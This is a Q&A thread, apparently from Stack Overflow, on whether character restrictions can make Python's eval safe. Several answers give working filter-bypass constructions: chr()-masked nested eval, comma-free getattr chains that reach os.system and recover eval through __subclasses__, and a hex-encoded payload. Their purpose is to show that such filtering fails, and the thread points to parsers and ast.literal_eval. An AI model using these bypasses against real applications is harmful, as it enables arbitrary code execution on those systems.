Is there a way to secure strings for Python's eval?

悲哀的现实 2021-02-08 07:43

There are many questions on SO about using Python's eval on insecure strings (e.g., Security of Python's eval() on untrusted strings?, Python: make eval safe).

7 Answers
  • 2021-02-08 07:54

    It's not enough to create input sanitization routines. You must also ensure that sanitization is never accidentally omitted. One way to do that is taint checking.
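
    As a rough illustration of the taint-checking idea, the sketch below marks untrusted input with a string subclass and refuses to evaluate anything that still carries the mark. The names Tainted, sanitize and guarded_eval, and the character whitelist, are assumptions made up for this example; they are not part of any library, and the sanitizer is only a placeholder.

```python
class Tainted(str):
    """Marks a string that came from an untrusted source (hypothetical helper)."""


# Assumed whitelist for this sketch: lowercase letters, digits and +-*/().
ALLOWED_CHARS = set("abcdefghijklmnopqrstuvwxyz0123456789+-*/()")


def sanitize(text):
    """Return an untainted plain str, or raise if a character is not allowed."""
    if not set(text) <= ALLOWED_CHARS:
        raise ValueError("disallowed characters in input")
    return "".join(text)  # joining the characters yields a plain str


def guarded_eval(expr):
    """Evaluate expr, but refuse anything still marked as tainted."""
    if isinstance(expr, Tainted):
        raise TypeError("refusing to eval unsanitized input")
    return eval(expr, {"__builtins__": {}})


user_input = Tainted("1+2*3")  # wrap input at the boundary where it enters
print(guarded_eval(sanitize(user_input)))
```

    This only works if every untrusted string is wrapped where it enters the program. Ordinary string operations such as concatenation return a plain str and drop the mark, so a real taint tracker needs more than this.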

  • 2021-02-08 07:56

    Here is a working "exploit" with your restrictions in place: it contains only lowercase ASCII characters and the signs +-*/(). It relies on a second eval layer.

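    def mask_code(python_code):
        # Spell out every character as chr(N) so the payload needs no quotes, dots or underscores.
        s = "+".join(["chr(" + str(ord(i)) + ")" for i in python_code])
        # Wrap the result in a second eval layer that rebuilds and runs the payload.
        return "eval(" + s + ")"
    
    bad_code = '''__import__("os").getcwd()'''
    masked = mask_code(bad_code)
    print(masked)
    print(eval(masked))  # run the masked string through eval
    

    output:

    eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(103)+chr(101)+chr(116)+chr(99)+chr(119)+chr(100)+chr(40)+chr(41))
    /home/user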
    

    This is a very trivial "exploit". I'm sure there are countless others, even with further character restrictions. It bears repeating that one should always use a parser or ast.literal_eval(). Only by parsing the tokens can one be sure the string is safe to evaluate. Anything else is betting against the house.
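
    For the ast.literal_eval() route, a minimal sketch might look like the following. The helper name try_literal is made up for this example; ast.literal_eval itself is the standard-library function, which accepts only literals and containers of literals and raises on anything else.

```python
import ast


def try_literal(text):
    """Return (True, value) for a pure Python literal, (False, None) otherwise."""
    try:
        return True, ast.literal_eval(text)
    except (ValueError, SyntaxError):
        # Function calls, names, attribute access and broken syntax end up here.
        return False, None


print(try_literal("[1, 2, {'a': 3.5}]"))
print(try_literal('__import__("os").getcwd()'))
print(try_literal("eval(chr(111)+chr(115))"))
```

    The last two inputs are rejected because they contain function calls, which are not literals, so the masked payload never gets a chance to run.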

  • 2021-02-08 07:58

    Assuming the named functions exist and are safe:

    if re.match("^(?:safe|soft|cotton|ball|[()])+$", code): eval(code)
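
    A self-contained version of the same idea could look like this. The four functions are hypothetical stand-ins for the "named functions" assumed above, and passing an explicit namespace with empty built-ins is an extra precaution added for this sketch, not something the one-liner does.

```python
import re


# Hypothetical stand-ins for the functions assumed to exist and be safe.
def ball():
    return "ball"


def cotton(x):
    return "cotton(%s)" % x


def soft(x):
    return "soft(%s)" % x


def safe(x):
    return "safe(%s)" % x


# The input must consist solely of the whitelisted names and parentheses.
ALLOWED = re.compile(r"(?:safe|soft|cotton|ball|[()])+")
NAMES = {"__builtins__": {}, "safe": safe, "soft": soft,
         "cotton": cotton, "ball": ball}


def run(code):
    if ALLOWED.fullmatch(code) is None:
        raise ValueError("input contains something other than whitelisted tokens")
    return eval(code, NAMES)


print(run("safe(soft(cotton(ball())))"))
```

    The pattern checks tokens only, not syntax, so an input such as "ballball" still passes the check and then fails inside eval with an ordinary exception.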
    
  • 2021-02-08 08:07

    To study how to make eval safe, I suggest the RestrictedPython module (over 10 years of production usage; a fine piece of Python software).

    http://pypi.python.org/pypi/RestrictedPython

    RestrictedPython takes Python source code and modifies its AST (Abstract Syntax Tree) to make evaluation safe within the sandbox, without leaking any Python internals that might allow code to escape the sandbox.

    From the RestrictedPython source code you'll learn what kinds of tricks are needed to sandbox Python safely.

  • 2021-02-08 08:14

    An exploit similar to goncalopp's, but one that also satisfies the restriction that the string 'eval' is not a substring of the exploit:

    def to_chrs(text):
        return '+'.join('chr(%d)' % ord(c) for c in text)
    
    def _make_getattr_call(obj, attr):
        return 'getattr(*(list(%s for a in chr(1)) + list(%s for a in chr(1))))' % (obj, attr)
    
    def make_exploit(code):
        get = to_chrs('get')
        builtins = to_chrs('__builtins__')
        eval = to_chrs('eval')
        code = to_chrs(code)
        return (_make_getattr_call(
                    _make_getattr_call('globals()', '{get}') + '({builtins})',
                    '{eval}') + '({code})').format(**locals())
    

    It uses a combination of generator expressions and argument unpacking to call getattr with two arguments without using a comma.
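
    The comma-free call can be seen in isolation on a harmless object. The sketch below is only an illustration of the trick; the variable names and the "hello"/"upper" example are made up here.

```python
# "x for a in chr(1)" yields x exactly once, because chr(1) is a string of
# length one. Wrapping it in list() gives a one-element list without a comma.
obj_part = list("hello" for a in chr(1))
attr_part = list("upper" for a in chr(1))

# Concatenating the two lists and star-unpacking the result passes both
# values to getattr, which is the same as getattr("hello", "upper").
method = getattr(*(obj_part + attr_part))

print(method())  # HELLO
```

    In the exploit, the two literal strings are replaced by chr(...) sums, so the final expression contains neither quotes nor commas.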

    An example usage:

    >>> exploit =  make_exploit('__import__("os").system("echo $PWD")')
    >>> print exploit
    getattr(*(list(getattr(*(list(globals() for a in chr(1)) + list(chr(103)+chr(101)+chr(116) for a in chr(1))))(chr(95)+chr(95)+chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)+chr(95)+chr(95)) for a in chr(1)) + list(chr(101)+chr(118)+chr(97)+chr(108) for a in chr(1))))(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(34)+chr(101)+chr(99)+chr(104)+chr(111)+chr(32)+chr(36)+chr(80)+chr(87)+chr(68)+chr(34)+chr(41))
    >>> eval(exploit)
    /home/giacomo
    0
    

    This shows that it is really hard to make code safe by placing restrictions only on its text. Even checks like 'eval' in code are not safe. Either you must remove the possibility of executing a function call at all, or you must remove all dangerous built-ins from eval's environment. My exploit also shows that getattr is as bad as eval even when you cannot use the comma, since it lets you walk arbitrarily through the object hierarchy. For example, you can obtain the real eval function even if the environment does not provide it:

    def real_eval():
        get_subclasses = _make_getattr_call(
                             _make_getattr_call(
                                 _make_getattr_call('()',
                                     to_chrs('__class__')),
                                 to_chrs('__base__')),
                             to_chrs('__subclasses__')) + '()'
    
        catch_warnings = 'next(c for c in %s if %s == %s)()' % (get_subclasses,
                                                                _make_getattr_call('c',
                                                                    to_chrs('__name__')),
                                                                to_chrs('catch_warnings'))
    
        return _make_getattr_call(
                   _make_getattr_call(
                       _make_getattr_call(catch_warnings, to_chrs('_module')),
                       to_chrs('__builtins__')),
                   to_chrs('get')) + '(%s)' % to_chrs('eval')
    
    
    >>> no_eval = __builtins__.__dict__.copy()
    >>> del no_eval['eval']
    >>> eval(real_eval(), {'__builtins__': no_eval})
    <built-in function eval>
    

    However, if you remove all the built-ins, the code becomes safe:

    >>> eval(real_eval(), {'__builtins__': None})
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<string>", line 1, in <module>
    NameError: name 'getattr' is not defined
    

    Note that setting '__builtins__' to None also removes chr, list, tuple, etc. The combination of your character restrictions and setting '__builtins__' to None is completely safe, because the user has no way to access anything. The user can't use the dot, the brackets [] or any built-in function or type.

    That said, what you can evaluate this way is pretty limited. You can't do much more than operations on numbers.
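
    A small sketch of what is left once the built-ins are gone: plain arithmetic still evaluates, while any name lookup fails. The helper is_blocked is made up for this example, and it catches both NameError and TypeError because the exact exception raised for a missing built-in differs between Python versions.

```python
def is_blocked(expr):
    """Return True if expr cannot be evaluated without any built-ins."""
    try:
        eval(expr, {"__builtins__": None})
    except (NameError, TypeError):
        return True
    return False


# Arithmetic needs no names at all, so it still works.
print(eval("(1+2)*3", {"__builtins__": None}))  # 9

# Anything that has to look up a built-in name is refused.
print(is_blocked("chr(1)"))
print(is_blocked("getattr"))
```

    This relies on the character restrictions as well: without them, attribute access with the dot would still be available even though the built-ins are gone.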

    It is probably enough to remove eval, getattr, and chr from the built-ins to make the code safe; at least, I can't think of a way to write an exploit that does not use one of them.

    A "parsing" approach is probably safer and gives more flexibility. For example, this recipe is pretty good and is also easy to customize to add more restrictions.
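
    To give an idea of what a parsing approach can look like (this is not the recipe referred to above, only a minimal sketch written for illustration), the code below parses the input with the standard ast module and evaluates only numbers and the operators + - * /. The function name eval_arithmetic and the operator tables are assumptions of this example.

```python
import ast
import operator

# Whitelisted operators; every other node type is rejected.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def eval_arithmetic(text):
    """Evaluate +, -, *, / over numbers; raise ValueError for anything else."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError("disallowed syntax: %s" % type(node).__name__)

    return walk(ast.parse(text, mode="eval"))


print(eval_arithmetic("2*(3+4)-1"))  # 13
```

    Because the walker never calls eval and only handles the node types it knows, function calls, names and attribute access are all rejected. Adding a new allowed construct means adding one more branch.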

  • 2021-02-08 08:16

    No, there isn't, or at least, not a sensible, truly secure way. Python is a highly dynamic language, and the flipside of that is that it's very easy to subvert any attempt to lock the language down.

    You either need to write your own parser for the subset you want, or use something existing, like ast.literal_eval(), for particular cases as you come across them. Use a tool designed for the job at hand, rather than trying to force an existing one to do the job you want, badly.

    Edit:

    An example of two strings that, while fitting your description, would execute arbitrary code if eval()ed in order (this particular example runs evil.__method__()):

    "from binascii import *"
    "eval(unhexlify('6576696c2e5f5f6d6574686f645f5f2829'))"
    
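    To see what the second string hides, the hex payload can be decoded without evaluating it. This is just a check of the example above; the variable name payload is made up here.

```python
from binascii import unhexlify

# Decode the hex string only; nothing is evaluated here.
payload = unhexlify('6576696c2e5f5f6d6574686f645f5f2829')
print(payload)  # b'evil.__method__()' on Python 3
```

    The text that reaches the inner eval is therefore completely different from the text a character-based filter inspected.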